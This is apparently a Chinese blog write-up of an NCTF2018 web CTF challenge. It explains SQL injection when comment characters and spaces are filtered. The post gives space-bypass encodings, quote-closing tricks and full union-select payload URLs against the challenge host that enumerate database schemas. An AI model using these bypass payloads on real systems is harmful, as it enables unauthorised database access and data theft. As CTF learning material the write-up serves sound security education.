sql注入过滤了#,--+怎么办
题目是NCTF2018的web题目
①#
?id=1'会直接出来报错提示。

猜测使用单引号保护id。
另外一打空格就提示you hacker,空格在尾部是不会提示的,猜测用了去除尾部的空格的函数trim()。
空格的过滤绕过
%20 %09 %0a %0b %0c %0d %a0 %00 /**/ ()
挨个试就行,最好不要用(),因为拼接什么的挺麻烦的
发现%a0 %0b () 没有被过滤,就用%a0吧
另外还发现了过滤了截断符号%23,#,--+
过滤了截断符号后,我们怎么来绕过最后的那个单引号呢?
常见的sql查询语句:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
我指的单引号就是$id'的这个单引号,一般我们会用#注释掉,现在没法注释掉后,应该怎么办呢?
我们来看个sql:

参数?id=1'',sql语句仍然能执行成功,题目中也是如此。
当有一个'时,这一个'会落单报错,但是当有一个和他一起闭合时就不报错了
只要'能匹配,多少个'都没有事。
select '' 这样虽然查询为空,但是是不报错的。
我们输入 ?id=1'' ,会发现不报错了已经,但是我们尝试?id=1' or 1=1'
发现出错了。是因为只能直接用在select中,注意是直接。
?id=1'' 查询语句变为select * from user where id='1''' LIMIT0,1 可以
?id=1' and 1=1' 查询:SELECT * FROM users WHERE id='1' or 1=1'' LIMIT 0,1 不可以
id=-1' union select 1,2,3' 可以
所以说是直接在select中
我们本来要靠order by来猜多少个字段,现在不行了直接根据这个来猜:id=-1' union select 1,2,3'
id=1'%a0union%a0select%a01,2,3',其实这里也不用猜,很明显了,输出了三个字段。
查询所有数据库
select * from user where id='-1' union select group_concat(schema_name),2 from information_schema.schemata'发现又遇到了上边的情况了
'匹配只能直接在select中,
这里的解决方法使用到的子查询
select * from user where id='-1' union select (select group_concat(schema_name) from information_schema.schemata),2,这样'不就直接在select语句里了。

总结一下,select ''就是查询一个空值,和select1,2,3本质是一样的,所以不会出错,当''没有被select,就相当于一对孤零零的引号,所以会出错。
②#
今天又学到一个新的思路,就是不用select子查询,用and'闭合。
?id=1%27%a0union%a0select%a0(select%a0group_concat(schema_name)%a0from%a0information_schema.schemata),2,3%a0and%271
实际句子就是select1,2,3 from infor....#
变为 select1,2,3 from infor.... and'1' 这样也可以把最后的单引号闭合
这样一来那些order by,and 1=1,and 1=2就可以正常使用判断注入点了
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0or%a01=2%a0and%a0%271
http://ctfgame.acdxvfsvd.net:20001/index.php?id=1%27%a0or%a01=1%a0and%a0%271
这个语句就可以判断注入点。
sql注入过滤了#,--+怎么办的更多相关文章
- sql注入过滤的公共方法
/// <summary> ///SQL注入过滤 /// </summary> /// <param name="InText">要过滤的字符串 ...
- 【转载】C#防SQL注入过滤危险字符信息
不过是java开发还是C#开发或者PHP的开发中,都需要关注SQL注入攻击的安全性问题,为了保证客户端提交过来的数据不会产生SQL注入的风险,我们需要对接收的数据进行危险字符过滤来防范SQL注入攻击的 ...
- php防sql注入过滤代码
防止sql注入的函数,过滤掉那些非法的字符,提高sql安全性,同时也可以过滤XSS的攻击. function filter($str) { if (empty($str)) return false; ...
- Python sql注入 过滤字符串的非法字符
#coding:utf8 #在开发过程中,要对前端传过来的数据进行验证,防止sql注入攻击,其中的一个方案就是过滤用户传过来的非法的字符 def sql_filter(sql, max_length= ...
- 防止sql注入,过滤敏感关键字
//sql过滤关键字 public static bool CheckKeyWord(string sWord) { //过滤关键字 string StrKeyWord = @"select ...
- SQL注入(过滤空格和--+等注释符)
1.地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤了空格和--+等注释符) 思路:确定注入参数值类型,直接输入单引号,根据报错信息确定参数值类型为字符型 ...
- java过滤防止sql注入过滤
/** * 过滤特殊字符 * @author: Simon * @date: 2017年8月31日 下午1:47:56 * @param str * @return */ public static ...
- 【数据库】 防止sql注入,过滤敏感关键字
private bool FilterIllegalChar(string sWord) { var result = false; var keyWord = @"select|inser ...
- 【记录】SQL注入过滤源码分享
$id=check_addslashes($_GET['id']);$id= preg_replace('/o*r/i',"", $id); //strip out OR (non ...
随机推荐
- Check Point R80 Security Management
平台: CentOS 类型: 虚拟机镜像 软件包: Security Management basic software security 服务优惠价: 按服务商许可协议 云服务器费用:查看费用 立即 ...
- 签证-L1/L2
http://blog.sina.com.cn/s/blog_7664b7f70102uweb.html 14年4月我接到公司通知,要从MICROSTRATEGY中国研发中心内部transfer到美国 ...
- HDU5124 lines
离散化 + 树状数组. 这些东西自己都是刚接触不久的,所以需要多写点题练练手. 题目描述: 一维坐标中有N条线段,其中有一个点上面覆盖的线段数是最多的,求该点上面的线段数目. 这道题和HDU1556特 ...
- iOS内存探秘
http://www.cocoachina.com/ios/20170216/18689.html iOS 内存机制特点 有限的可用内存 iPhone 设备的 RAM 一直非常紧缺,iPhone 一代 ...
- 【BZOJ4033】[HAOI2015] 树上染色(树形DP)
点此看题面 大致题意: 给你一棵点数为N的带权树,要你在这棵树中选择K个点染成黑色,并将其他的N-K个点染成白色.要求你求出黑点两两之间的距离加上白点两两之间距离的和的最大值. 树形\(DP\) 这道 ...
- 【洛谷2216】[HAOI2007] 理想的正方形(二维RMQ)
点此看题面 大致题意: 求出一个矩阵中所有\(n*n\)正方形中极差的最小值. 另一种做法 听说这题可以用单调队列去做,但是我写了一个二维\(RMQ\). 二维\(RMQ\) \(RMQ\)相信大家都 ...
- 2018.5.30 Oracle数据库PLSQL编程---游标的使用
显示游标的步骤 /* 显示游标处理步骤 1.声明游标 语法结构:cursor 游标名称 is SQL 语句; 2.打开游标 语法结构:open游标名称; 3.提取数据 语法结构:fetch 4.关闭游 ...
- 解决session过期跳转到登录页并跳出iframe框架(或者layui弹出层)
当用户长时间停留在管理界面没有操作,等到session过期后,进行了操作,那么只是iframe跳转到login页面,这不是我们想要的结果.解决方法:在login页面加一个逻辑判断: <scrip ...
- 深入理解Java GC
一.概述 GC(Carbage Collection)垃圾收集器,由JVM自动回收已死亡的对象垃圾. 这也是Java与C++等语言的主要区别之一. 二.如何确认对象已死 1. 引用计数算法 引用计数法 ...
- vue切换路由时动画
安装个包 npm i nprogress 直接导入使用 最终的效果就是